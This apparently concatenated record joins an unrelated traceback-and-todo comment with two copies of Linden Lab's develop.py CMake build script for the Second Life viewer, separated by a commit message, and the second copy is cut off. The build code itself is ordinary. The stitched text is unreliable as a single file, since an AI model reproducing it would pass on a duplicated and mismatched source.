#done: 2017-10-7 2017-09-30 failed to send command to a session whose name start with numbers e.g. 1_session
# Traceback (most recent call last):
# File "C:/workspace/gDasH\gui\DasHFrame.py", line 588, in on_command_enter
# instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
# File "C:/workspace/gDasH\lib\common.py", line 153, in call_function_in_module
# eval('GetFunArgs({args})'.format(args=args_string))
# File "<string>", line 1
# GetFunArgs(35b)
# ^
# SyntaxError: invalid syntax
#todo: start thread for all gui event handlers with decoration, catch all exceptions
|
#!/usr/bin/env python
#
# @file develop.py
# @authors Bryan O'Sullivan, Mark Palange, Aaron Brashears
# @brief Fire and forget script to appropriately configure cmake for SL.
#
# $LicenseInfo:firstyear=2007&license=viewergpl$
#
# Copyright (c) 2007-2009, Linden Research, Inc.
#
# Second Life Viewer Source Code
# The source code in this file ("Source Code") is provided by Linden Lab
# to you under the terms of the GNU General Public License, version 2.0
# ("GPL"), unless you have obtained a separate licensing agreement
# ("Other License"), formally executed by you and Linden Lab. Terms of
# the GPL can be found in doc/GPL-license.txt in this distribution, or
# online at http://secondlifegrid.net/programs/open_source/licensing/gplv2
#
# There are special exceptions to the terms and conditions of the GPL as
# it is applied to this Source Code. View the full text of the exception
# in the file doc/FLOSS-exception.txt in this software distribution, or
# online at
# http://secondlifegrid.net/programs/open_source/licensing/flossexception
#
# By copying, modifying or distributing this software, you acknowledge
# that you have read and understood your obligations described above,
# and agree to abide by those obligations.
#
# ALL LINDEN LAB SOURCE CODE IS PROVIDED "AS IS." LINDEN LAB MAKES NO
# WARRANTIES, EXPRESS, IMPLIED OR OTHERWISE, REGARDING ITS ACCURACY,
# COMPLETENESS OR PERFORMANCE.
# $/LicenseInfo$
import errno
import getopt
import os
import random
import re
import shutil
import socket
import sys
import commands
import subprocess
class CommandError(Exception):
pass
def mkdir(path):
try:
os.mkdir(path)
return path
except OSError, err:
if err.errno != errno.EEXIST or not os.path.isdir(path):
raise
def getcwd():
cwd = os.getcwd()
if 'a' <= cwd[0] <= 'z' and cwd[1] == ':':
# CMake wants DOS drive letters to be in uppercase. The above
# condition never asserts on platforms whose full path names
# always begin with a slash, so we don't need to test whether
# we are running on Windows.
cwd = cwd[0].upper() + cwd[1:]
return cwd
def quote(opts):
return '"' + '" "'.join([ opt.replace('"', '') for opt in opts ]) + '"'
class PlatformSetup(object):
generator = None
build_types = {}
for t in ('Debug', 'Release', 'RelWithDebInfo'):
build_types[t.lower()] = t
build_type = build_types['relwithdebinfo']
standalone = 'OFF'
unattended = 'OFF'
universal = 'OFF'
project_name = 'SecondLife'
distcc = True
cmake_opts = []
word_size = 32
def __init__(self):
self.script_dir = os.path.realpath(
os.path.dirname(__import__(__name__).__file__))
def os(self):
'''Return the name of the OS.'''
raise NotImplemented('os')
def arch(self):
'''Return the CPU architecture.'''
return None
def platform(self):
'''Return a stringified two-tuple of the OS name and CPU
architecture.'''
ret = self.os()
if self.arch():
ret += '-' + self.arch()
return ret
def build_dirs(self):
'''Return the top-level directories in which builds occur.
This can return more than one directory, e.g. if doing a
32-bit viewer and server build on Linux.'''
return ['build-' + self.platform()]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
'''Return the command line to run cmake with.'''
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
word_size=self.word_size,
type=self.build_type.upper(),
)
#if simple:
# return 'cmake %(opts)s %(dir)r' % args
return ('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-G %(generator)r %(opts)s %(dir)r' % args)
def run_cmake(self, args=[]):
'''Run cmake.'''
# do a sanity check to make sure we have a generator
if not hasattr(self, 'generator'):
raise "No generator available for '%s'" % (self.__name__,)
cwd = getcwd()
created = []
try:
for d in self.build_dirs():
simple = True
if mkdir(d):
created.append(d)
simple = False
try:
os.chdir(d)
cmd = self.cmake_commandline(cwd, d, args, simple)
print 'Running %r in %r' % (cmd, d)
self.run(cmd, 'cmake')
finally:
os.chdir(cwd)
except:
# If we created a directory in which to run cmake and
# something went wrong, the directory probably just
# contains garbage, so delete it.
os.chdir(cwd)
for d in created:
print 'Cleaning %r' % d
shutil.rmtree(d)
raise
def parse_build_opts(self, arguments):
opts, targets = getopt.getopt(arguments, 'o:', ['option='])
build_opts = []
for o, a in opts:
if o in ('-o', '--option'):
build_opts.append(a)
return build_opts, targets
def run_build(self, opts, targets):
'''Build the default targets for this platform.'''
raise NotImplemented('run_build')
def cleanup(self):
'''Delete all build directories.'''
cleaned = 0
for d in self.build_dirs():
if os.path.isdir(d):
print 'Cleaning %r' % d
shutil.rmtree(d)
cleaned += 1
if not cleaned:
print 'Nothing to clean up!'
def is_internal_tree(self):
'''Indicate whether we are building in an internal source tree.'''
return os.path.isdir(os.path.join(self.script_dir, 'newsim'))
def find_in_path(self, name, defval=None, basename=False):
for ext in self.exe_suffixes:
name_ext = name + ext
if os.sep in name_ext:
path = os.path.abspath(name_ext)
if os.access(path, os.X_OK):
return [basename and os.path.basename(path) or path]
for p in os.getenv('PATH', self.search_path).split(os.pathsep):
path = os.path.join(p, name_ext)
if os.access(path, os.X_OK):
return [basename and os.path.basename(path) or path]
if defval:
return [defval]
return []
class UnixSetup(PlatformSetup):
'''Generic Unixy build instructions.'''
search_path = '/usr/bin:/usr/local/bin'
exe_suffixes = ('',)
def __init__(self):
super(UnixSetup, self).__init__()
self.generator = 'Unix Makefiles'
def os(self):
return 'unix'
def arch(self):
cpu = os.uname()[-1]
if cpu.endswith('386'):
cpu = 'i386'
elif cpu.endswith('86'):
cpu = 'i686'
elif cpu in ('athlon',):
cpu = 'i686'
elif cpu == 'Power Macintosh':
cpu = 'ppc'
elif cpu == 'x86_64' and self.word_size == 32:
cpu = 'i686'
return cpu
def run(self, command, name=None):
'''Run a program. If the program fails, raise an exception.'''
sys.stdout.flush()
ret = os.system(command)
if ret:
if name is None:
name = command.split(None, 1)[0]
if os.WIFEXITED(ret):
st = os.WEXITSTATUS(ret)
if st == 127:
event = 'was not found'
else:
event = 'exited with status %d' % st
elif os.WIFSIGNALED(ret):
event = 'was killed by signal %d' % os.WTERMSIG(ret)
else:
event = 'died unexpectedly (!?) with 16-bit status %d' % ret
raise CommandError('the command %r %s' %
(name, event))
class LinuxSetup(UnixSetup):
def __init__(self):
super(LinuxSetup, self).__init__()
try:
self.debian_sarge = open('/etc/debian_version').read().strip() == '3.1'
except:
self.debian_sarge = False
def os(self):
return 'linux'
def build_dirs(self):
# Only build the server code if we have it.
platform_build = '%s-%s' % (self.platform(), self.build_type.lower())
if self.arch() == 'i686' and self.is_internal_tree():
return ['viewer-' + platform_build, 'server-' + platform_build]
elif self.arch() == 'x86_64' and self.is_internal_tree():
# the viewer does not build in 64bit -- kdu5 issues
# we can either use openjpeg, or overhaul our viewer to handle kdu5 or higher
# doug knows about kdu issues
return ['server-' + platform_build]
else:
return ['viewer-' + platform_build]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
type=self.build_type.upper(),
project_name=self.project_name,
word_size=self.word_size,
)
if not self.is_internal_tree():
args.update({'cxx':'g++', 'server':'OFF', 'viewer':'ON'})
else:
if self.distcc:
distcc = self.find_in_path('distcc')
baseonly = True
else:
distcc = []
baseonly = False
if 'server' in build_dir:
gcc = distcc + self.find_in_path(
self.debian_sarge and 'g++-3.3' or 'g++-4.1',
'g++', baseonly)
args.update({'cxx': ' '.join(gcc), 'server': 'ON',
'viewer': 'OFF'})
else:
gcc41 = distcc + self.find_in_path('g++-4.1', 'g++', baseonly)
args.update({'cxx': ' '.join(gcc41),
'server': 'OFF',
'viewer': 'ON'})
cmd = (('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-G %(generator)r -DSERVER:BOOL=%(server)s '
'-DVIEWER:BOOL=%(viewer)s -DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s %(dir)r')
% args)
if 'CXX' not in os.environ:
args.update({'cmd':cmd})
cmd = ('CXX=%(cxx)r %(cmd)s' % args)
return cmd
def run_build(self, opts, targets):
job_count = None
for i in range(len(opts)):
if opts[i].startswith('-j'):
try:
job_count = int(opts[i][2:])
except ValueError:
try:
job_count = int(opts[i+1])
except ValueError:
job_count = True
def get_cpu_count():
count = 0
for line in open('/proc/cpuinfo'):
if re.match(r'processor\s*:', line):
count += 1
return count
def localhost():
count = get_cpu_count()
return 'localhost/' + str(count), count
def get_distcc_hosts():
try:
hosts = []
name = os.getenv('DISTCC_DIR', '/etc/distcc') + '/hosts'
for l in open(name):
l = l[l.find('#')+1:].strip()
if l: hosts.append(l)
return hosts
except IOError:
return (os.getenv('DISTCC_HOSTS', '').split() or
[localhost()[0]])
def count_distcc_hosts():
cpus = 0
hosts = 0
for host in get_distcc_hosts():
m = re.match(r'.*/(\d+)', host)
hosts += 1
cpus += m and int(m.group(1)) or 1
return hosts, cpus
def mk_distcc_hosts(basename, range, num_cpus):
'''Generate a list of LL-internal machines to build on.'''
loc_entry, cpus = localhost()
hosts = [loc_entry]
dead = []
stations = [s for s in xrange(range) if s not in dead]
random.shuffle(stations)
hosts += ['%s%d.lindenlab.com/%d,lzo' % (basename, s, num_cpus) for s in stations]
cpus += 2 * len(stations)
return ' '.join(hosts), cpus
if job_count is None:
hosts, job_count = count_distcc_hosts()
hostname = socket.gethostname()
if hosts == 1:
if hostname.startswith('station'):
hosts, job_count = mk_distcc_hosts('station', 36, 2)
os.environ['DISTCC_HOSTS'] = hosts
if hostname.startswith('eniac'):
hosts, job_count = mk_distcc_hosts('eniac', 71, 2)
os.environ['DISTCC_HOSTS'] = hosts
if hostname.startswith('build'):
max_jobs = 6
else:
max_jobs = 12
if job_count > max_jobs:
job_count = max_jobs;
opts.extend(['-j', str(job_count)])
if targets:
targets = ' '.join(targets)
else:
targets = 'all'
for d in self.build_dirs():
cmd = 'make -C %r %s %s' % (d, ' '.join(opts), targets)
print 'Running %r' % cmd
self.run(cmd)
class DarwinSetup(UnixSetup):
def __init__(self):
super(DarwinSetup, self).__init__()
self.generator = 'Xcode'
def os(self):
return 'darwin'
def arch(self):
if self.universal == 'ON':
return 'universal'
else:
return UnixSetup.arch(self)
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
word_size=self.word_size,
unattended=self.unattended,
project_name=self.project_name,
universal=self.universal,
type=self.build_type.upper(),
)
if self.universal == 'ON':
args['universal'] = '-DCMAKE_OSX_ARCHITECTURES:STRING=\'i386;ppc\''
#if simple:
# return 'cmake %(opts)s %(dir)r' % args
return ('cmake -G %(generator)r '
'-DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(universal)s '
'%(opts)s %(dir)r' % args)
def run_build(self, opts, targets):
cwd = getcwd()
if targets:
targets = ' '.join(['-target ' + repr(t) for t in targets])
else:
targets = ''
cmd = ('xcodebuild -configuration %s %s %s | grep -v "^[[:space:]]*setenv" ; exit ${PIPESTATUS[0]}' %
(self.build_type, ' '.join(opts), targets))
for d in self.build_dirs():
try:
os.chdir(d)
print 'Running %r in %r' % (cmd, d)
self.run(cmd)
finally:
os.chdir(cwd)
class WindowsSetup(PlatformSetup):
gens = {
'vc71' : {
'gen' : r'Visual Studio 7 .NET 2003',
'ver' : r'7.1'
},
'vc80' : {
'gen' : r'Visual Studio 8 2005',
'ver' : r'8.0'
},
'vc90' : {
'gen' : r'Visual Studio 9 2008',
'ver' : r'9.0'
}
}
gens['vs2003'] = gens['vc71']
gens['vs2005'] = gens['vc80']
gens['vs2008'] = gens['vc90']
search_path = r'C:\windows'
exe_suffixes = ('.exe', '.bat', '.com')
def __init__(self):
super(WindowsSetup, self).__init__()
self._generator = None
self.incredibuild = False
def _get_generator(self):
if self._generator is None:
for version in 'vc80 vc90 vc71'.split():
if self.find_visual_studio(version):
self._generator = version
print 'Building with ', self.gens[version]['gen']
break
else:
print >> sys.stderr, 'Cannot find a Visual Studio installation!'
sys.exit(1)
return self._generator
def _set_generator(self, gen):
self._generator = gen
generator = property(_get_generator, _set_generator)
def os(self):
return 'win32'
def build_dirs(self):
return ['build-' + self.generator]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.gens[self.generator.lower()]['gen'],
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
project_name=self.project_name,
word_size=self.word_size,
)
#if simple:
# return 'cmake %(opts)s "%(dir)s"' % args
return ('cmake -G "%(generator)s" '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s "%(dir)s"' % args)
def get_HKLM_registry_value(self, key_str, value_str):
import _winreg
reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
key = _winreg.OpenKey(reg, key_str)
value = _winreg.QueryValueEx(key, value_str)[0]
print 'Found: %s' % value
return value
def find_visual_studio(self, gen=None):
if gen is None:
gen = self._generator
gen = gen.lower()
value_str = (r'EnvironmentDirectory')
key_str = (r'SOFTWARE\Microsoft\VisualStudio\%s\Setup\VS' %
self.gens[gen]['ver'])
print ('Reading VS environment from HKEY_LOCAL_MACHINE\%s\%s' %
(key_str, value_str))
try:
return self.get_HKLM_registry_value(key_str, value_str)
except WindowsError, err:
key_str = (r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\%s\Setup\VS' %
self.gens[gen]['ver'])
try:
return self.get_HKLM_registry_value(key_str, value_str)
except:
print >> sys.stderr, "Didn't find ", self.gens[gen]['gen']
return ''
def get_build_cmd(self):
if self.incredibuild:
config = self.build_type
if self.gens[self.generator]['ver'] in [ r'8.0', r'9.0' ]:
config = '\"%s|Win32\"' % config
executable = self.find_in_path('buildconsole')[0]
cmd = "%(bin)s %(prj)s.sln /build /cfg=%(cfg)s" % {'prj': self.project_name, 'cfg': config, 'bin': executable}
return (executable, cmd)
# devenv.com is CLI friendly, devenv.exe... not so much.
executable = '%sdevenv.com' % (self.find_visual_studio(),)
cmd = ('"%s" %s.sln /build %s' %
(executable, self.project_name, self.build_type))
return (executable, cmd)
def run(self, command, name=None, retry_on=None, retries=1):
'''Run a program. If the program fails, raise an exception.'''
assert name is not None, 'On windows an executable path must be given in name.'
if not os.path.isfile(name):
name = self.find_in_path(name)[0]
while retries:
retries = retries - 1
print "develop.py tries to run:", command
ret = subprocess.call(command, executable=name)
print "got ret", ret, "from", command
if ret:
if not name:
error = 'was not found'
else:
error = 'exited with status %d' % ret
if retry_on is not None and retry_on == ret:
print "Retrying... the command %r %s" % (name, error)
else:
raise CommandError('the command %r %s' % (name, error))
def run_cmake(self, args=[]):
'''Override to add the vstool.exe call after running cmake.'''
PlatformSetup.run_cmake(self, args)
if self.unattended == 'OFF':
self.run_vstool()
def run_vstool(self):
for build_dir in self.build_dirs():
stamp = os.path.join(build_dir, 'vstool.txt')
try:
prev_build = open(stamp).read().strip()
except IOError:
prev_build = ''
if prev_build == self.build_type:
# Only run vstool if the build type has changed.
continue
executable = os.path.join('tools','vstool','VSTool.exe')
vstool_cmd = (executable +
' --solution ' +
os.path.join(build_dir,'SecondLife.sln') +
' --config ' + self.build_type +
' --startup secondlife-bin')
print 'Running %r in %r' % (vstool_cmd, getcwd())
self.run(vstool_cmd, name=executable)
print >> open(stamp, 'w'), self.build_type
def run_build(self, opts, targets):
cwd = getcwd()
executable, build_cmd = self.get_build_cmd()
for d in self.build_dirs():
try:
os.chdir(d)
if targets:
for t in targets:
cmd = '%s /project %s %s' % (build_cmd, t, ' '.join(opts))
print 'Running %r in %r' % (cmd, d)
self.run(cmd, name=executable, retry_on=4, retries=3)
else:
cmd = '%s %s' % (build_cmd, ' '.join(opts))
print 'Running %r in %r' % (cmd, d)
self.run(cmd, name=executable, retry_on=4, retries=3)
finally:
os.chdir(cwd)
class CygwinSetup(WindowsSetup):
def __init__(self):
super(CygwinSetup, self).__init__()
self.generator = 'vc80'
def cmake_commandline(self, src_dir, build_dir, opts, simple):
dos_dir = commands.getoutput("cygpath -w %s" % src_dir)
args = dict(
dir=dos_dir,
generator=self.gens[self.generator.lower()]['gen'],
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
project_name=self.project_name,
word_size=self.word_size,
)
#if simple:
# return 'cmake %(opts)s "%(dir)s"' % args
return ('cmake -G "%(generator)s" '
'-DUNATTENDED:BOOl=%(unattended)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s "%(dir)s"' % args)
setup_platform = {
'darwin': DarwinSetup,
'linux2': LinuxSetup,
'win32' : WindowsSetup,
'cygwin' : CygwinSetup
}
usage_msg = '''
Usage: develop.py [options] [command [command-options]]
Options:
-h | --help print this help message
--standalone build standalone, without Linden prebuild libraries
--unattended build unattended, do not invoke any tools requiring
a human response
--universal build a universal binary on Mac OS X (unsupported)
-t | --type=NAME build type ("Debug", "Release", or "RelWithDebInfo")
-m32 | -m64 build architecture (32-bit or 64-bit)
-N | --no-distcc disable use of distcc
-G | --generator=NAME generator name
Windows: VC71 or VS2003 (default), VC80 (VS2005) or
VC90 (VS2008)
Mac OS X: Xcode (default), Unix Makefiles
Linux: Unix Makefiles (default), KDevelop3
-p | --project=NAME set the root project name. (Doesn't effect makefiles)
Commands:
build configure and build default target
clean delete all build directories, does not affect sources
configure configure project by running cmake (default command if none given)
Command-options for "configure":
We use cmake variables to change the build configuration.
-DSERVER:BOOL=OFF Don't configure simulator/dataserver/etc
-DVIEWER:BOOL=OFF Don't configure the viewer
-DPACKAGE:BOOL=ON Create "package" target to make installers
-DLOCALIZESETUP:BOOL=ON Create one win_setup target per supported language
Examples:
Set up a viewer-only project for your system:
develop.py configure -DSERVER:BOOL=OFF
Set up a Visual Studio 2005 project with "package" target:
develop.py -G vc80 configure -DPACKAGE:BOOL=ON
'''
def main(arguments):
if os.getenv('DISTCC_DIR') is None:
distcc_dir = os.path.join(getcwd(), '.distcc')
if not os.path.exists(distcc_dir):
os.mkdir(distcc_dir)
print "setting DISTCC_DIR to %s" % distcc_dir
os.environ['DISTCC_DIR'] = distcc_dir
else:
print "DISTCC_DIR is set to %s" % os.getenv('DISTCC_DIR')
setup = setup_platform[sys.platform]()
try:
opts, args = getopt.getopt(
arguments,
'?hNt:p:G:m:',
['help', 'standalone', 'no-distcc', 'unattended', 'universal', 'type=', 'incredibuild', 'generator=', 'project='])
except getopt.GetoptError, err:
print >> sys.stderr, 'Error:', err
print >> sys.stderr, """
Note: You must pass -D options to cmake after the "configure" command
For example: develop.py configure -DSERVER:BOOL=OFF"""
print >> sys.stderr, usage_msg.strip()
sys.exit(1)
for o, a in opts:
if o in ('-?', '-h', '--help'):
print usage_msg.strip()
sys.exit(0)
elif o in ('--standalone',):
setup.standalone = 'ON'
elif o in ('--unattended',):
setup.unattended = 'ON'
elif o in ('--universal',):
setup.universal = 'ON'
elif o in ('-m',):
if a in ('32', '64'):
setup.word_size = int(a)
else:
print >> sys.stderr, 'Error: unknown word size', repr(a)
print >> sys.stderr, 'Supported word sizes: 32, 64'
sys.exit(1)
elif o in ('-t', '--type'):
try:
setup.build_type = setup.build_types[a.lower()]
except KeyError:
print >> sys.stderr, 'Error: unknown build type', repr(a)
print >> sys.stderr, 'Supported build types:'
types = setup.build_types.values()
types.sort()
for t in types:
print ' ', t
sys.exit(1)
elif o in ('-G', '--generator'):
setup.generator = a
elif o in ('-N', '--no-distcc'):
setup.distcc = False
elif o in ('-p', '--project'):
setup.project_name = a
elif o in ('--incredibuild'):
setup.incredibuild = True
else:
print >> sys.stderr, 'INTERNAL ERROR: unhandled option', repr(o)
sys.exit(1)
if not args:
setup.run_cmake()
return
try:
cmd = args.pop(0)
if cmd in ('cmake', 'configure'):
setup.run_cmake(args)
elif cmd == 'build':
for d in setup.build_dirs():
if not os.path.exists(d):
raise CommandError('run "develop.py cmake" first')
setup.run_cmake()
opts, targets = setup.parse_build_opts(args)
setup.run_build(opts, targets)
elif cmd == 'clean':
if args:
raise CommandError('clean takes no arguments')
setup.cleanup()
else:
print >> sys.stderr, 'Error: unknown subcommand', repr(cmd)
print >> sys.stderr, "(run 'develop.py --help' for help)"
sys.exit(1)
except getopt.GetoptError, err:
print >> sys.stderr, 'Error with %r subcommand: %s' % (cmd, err)
sys.exit(1)
if __name__ == '__main__':
try:
main(sys.argv[1:])
except CommandError, err:
print >> sys.stderr, 'Error:', err
sys.exit(1)
DEV-44838 - See if buildconsole is confused by having the absolute path (with spaces) in the commandline. To accomplish this we put relative paths in the command string but lookup the absolute path for the executable parameter.
#!/usr/bin/env python
#
# @file develop.py
# @authors Bryan O'Sullivan, Mark Palange, Aaron Brashears
# @brief Fire and forget script to appropriately configure cmake for SL.
#
# $LicenseInfo:firstyear=2007&license=viewergpl$
#
# Copyright (c) 2007-2009, Linden Research, Inc.
#
# Second Life Viewer Source Code
# The source code in this file ("Source Code") is provided by Linden Lab
# to you under the terms of the GNU General Public License, version 2.0
# ("GPL"), unless you have obtained a separate licensing agreement
# ("Other License"), formally executed by you and Linden Lab. Terms of
# the GPL can be found in doc/GPL-license.txt in this distribution, or
# online at http://secondlifegrid.net/programs/open_source/licensing/gplv2
#
# There are special exceptions to the terms and conditions of the GPL as
# it is applied to this Source Code. View the full text of the exception
# in the file doc/FLOSS-exception.txt in this software distribution, or
# online at
# http://secondlifegrid.net/programs/open_source/licensing/flossexception
#
# By copying, modifying or distributing this software, you acknowledge
# that you have read and understood your obligations described above,
# and agree to abide by those obligations.
#
# ALL LINDEN LAB SOURCE CODE IS PROVIDED "AS IS." LINDEN LAB MAKES NO
# WARRANTIES, EXPRESS, IMPLIED OR OTHERWISE, REGARDING ITS ACCURACY,
# COMPLETENESS OR PERFORMANCE.
# $/LicenseInfo$
import errno
import getopt
import os
import random
import re
import shutil
import socket
import sys
import commands
import subprocess
class CommandError(Exception):
pass
def mkdir(path):
try:
os.mkdir(path)
return path
except OSError, err:
if err.errno != errno.EEXIST or not os.path.isdir(path):
raise
def getcwd():
cwd = os.getcwd()
if 'a' <= cwd[0] <= 'z' and cwd[1] == ':':
# CMake wants DOS drive letters to be in uppercase. The above
# condition never asserts on platforms whose full path names
# always begin with a slash, so we don't need to test whether
# we are running on Windows.
cwd = cwd[0].upper() + cwd[1:]
return cwd
def quote(opts):
return '"' + '" "'.join([ opt.replace('"', '') for opt in opts ]) + '"'
class PlatformSetup(object):
generator = None
build_types = {}
for t in ('Debug', 'Release', 'RelWithDebInfo'):
build_types[t.lower()] = t
build_type = build_types['relwithdebinfo']
standalone = 'OFF'
unattended = 'OFF'
universal = 'OFF'
project_name = 'SecondLife'
distcc = True
cmake_opts = []
word_size = 32
def __init__(self):
self.script_dir = os.path.realpath(
os.path.dirname(__import__(__name__).__file__))
def os(self):
'''Return the name of the OS.'''
raise NotImplemented('os')
def arch(self):
'''Return the CPU architecture.'''
return None
def platform(self):
'''Return a stringified two-tuple of the OS name and CPU
architecture.'''
ret = self.os()
if self.arch():
ret += '-' + self.arch()
return ret
def build_dirs(self):
'''Return the top-level directories in which builds occur.
This can return more than one directory, e.g. if doing a
32-bit viewer and server build on Linux.'''
return ['build-' + self.platform()]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
'''Return the command line to run cmake with.'''
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
word_size=self.word_size,
type=self.build_type.upper(),
)
#if simple:
# return 'cmake %(opts)s %(dir)r' % args
return ('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-G %(generator)r %(opts)s %(dir)r' % args)
def run_cmake(self, args=[]):
'''Run cmake.'''
# do a sanity check to make sure we have a generator
if not hasattr(self, 'generator'):
raise "No generator available for '%s'" % (self.__name__,)
cwd = getcwd()
created = []
try:
for d in self.build_dirs():
simple = True
if mkdir(d):
created.append(d)
simple = False
try:
os.chdir(d)
cmd = self.cmake_commandline(cwd, d, args, simple)
print 'Running %r in %r' % (cmd, d)
self.run(cmd, 'cmake')
finally:
os.chdir(cwd)
except:
# If we created a directory in which to run cmake and
# something went wrong, the directory probably just
# contains garbage, so delete it.
os.chdir(cwd)
for d in created:
print 'Cleaning %r' % d
shutil.rmtree(d)
raise
def parse_build_opts(self, arguments):
opts, targets = getopt.getopt(arguments, 'o:', ['option='])
build_opts = []
for o, a in opts:
if o in ('-o', '--option'):
build_opts.append(a)
return build_opts, targets
def run_build(self, opts, targets):
'''Build the default targets for this platform.'''
raise NotImplemented('run_build')
def cleanup(self):
'''Delete all build directories.'''
cleaned = 0
for d in self.build_dirs():
if os.path.isdir(d):
print 'Cleaning %r' % d
shutil.rmtree(d)
cleaned += 1
if not cleaned:
print 'Nothing to clean up!'
def is_internal_tree(self):
'''Indicate whether we are building in an internal source tree.'''
return os.path.isdir(os.path.join(self.script_dir, 'newsim'))
def find_in_path(self, name, defval=None, basename=False):
for ext in self.exe_suffixes:
name_ext = name + ext
if os.sep in name_ext:
path = os.path.abspath(name_ext)
if os.access(path, os.X_OK):
return [basename and os.path.basename(path) or path]
for p in os.getenv('PATH', self.search_path).split(os.pathsep):
path = os.path.join(p, name_ext)
if os.access(path, os.X_OK):
return [basename and os.path.basename(path) or path]
if defval:
return [defval]
return []
class UnixSetup(PlatformSetup):
'''Generic Unixy build instructions.'''
search_path = '/usr/bin:/usr/local/bin'
exe_suffixes = ('',)
def __init__(self):
super(UnixSetup, self).__init__()
self.generator = 'Unix Makefiles'
def os(self):
return 'unix'
def arch(self):
cpu = os.uname()[-1]
if cpu.endswith('386'):
cpu = 'i386'
elif cpu.endswith('86'):
cpu = 'i686'
elif cpu in ('athlon',):
cpu = 'i686'
elif cpu == 'Power Macintosh':
cpu = 'ppc'
elif cpu == 'x86_64' and self.word_size == 32:
cpu = 'i686'
return cpu
def run(self, command, name=None):
'''Run a program. If the program fails, raise an exception.'''
sys.stdout.flush()
ret = os.system(command)
if ret:
if name is None:
name = command.split(None, 1)[0]
if os.WIFEXITED(ret):
st = os.WEXITSTATUS(ret)
if st == 127:
event = 'was not found'
else:
event = 'exited with status %d' % st
elif os.WIFSIGNALED(ret):
event = 'was killed by signal %d' % os.WTERMSIG(ret)
else:
event = 'died unexpectedly (!?) with 16-bit status %d' % ret
raise CommandError('the command %r %s' %
(name, event))
class LinuxSetup(UnixSetup):
def __init__(self):
super(LinuxSetup, self).__init__()
try:
self.debian_sarge = open('/etc/debian_version').read().strip() == '3.1'
except:
self.debian_sarge = False
def os(self):
return 'linux'
def build_dirs(self):
# Only build the server code if we have it.
platform_build = '%s-%s' % (self.platform(), self.build_type.lower())
if self.arch() == 'i686' and self.is_internal_tree():
return ['viewer-' + platform_build, 'server-' + platform_build]
elif self.arch() == 'x86_64' and self.is_internal_tree():
# the viewer does not build in 64bit -- kdu5 issues
# we can either use openjpeg, or overhaul our viewer to handle kdu5 or higher
# doug knows about kdu issues
return ['server-' + platform_build]
else:
return ['viewer-' + platform_build]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
type=self.build_type.upper(),
project_name=self.project_name,
word_size=self.word_size,
)
if not self.is_internal_tree():
args.update({'cxx':'g++', 'server':'OFF', 'viewer':'ON'})
else:
if self.distcc:
distcc = self.find_in_path('distcc')
baseonly = True
else:
distcc = []
baseonly = False
if 'server' in build_dir:
gcc = distcc + self.find_in_path(
self.debian_sarge and 'g++-3.3' or 'g++-4.1',
'g++', baseonly)
args.update({'cxx': ' '.join(gcc), 'server': 'ON',
'viewer': 'OFF'})
else:
gcc41 = distcc + self.find_in_path('g++-4.1', 'g++', baseonly)
args.update({'cxx': ' '.join(gcc41),
'server': 'OFF',
'viewer': 'ON'})
cmd = (('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-G %(generator)r -DSERVER:BOOL=%(server)s '
'-DVIEWER:BOOL=%(viewer)s -DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s %(dir)r')
% args)
if 'CXX' not in os.environ:
args.update({'cmd':cmd})
cmd = ('CXX=%(cxx)r %(cmd)s' % args)
return cmd
def run_build(self, opts, targets):
job_count = None
for i in range(len(opts)):
if opts[i].startswith('-j'):
try:
job_count = int(opts[i][2:])
except ValueError:
try:
job_count = int(opts[i+1])
except ValueError:
job_count = True
def get_cpu_count():
count = 0
for line in open('/proc/cpuinfo'):
if re.match(r'processor\s*:', line):
count += 1
return count
def localhost():
count = get_cpu_count()
return 'localhost/' + str(count), count
def get_distcc_hosts():
try:
hosts = []
name = os.getenv('DISTCC_DIR', '/etc/distcc') + '/hosts'
for l in open(name):
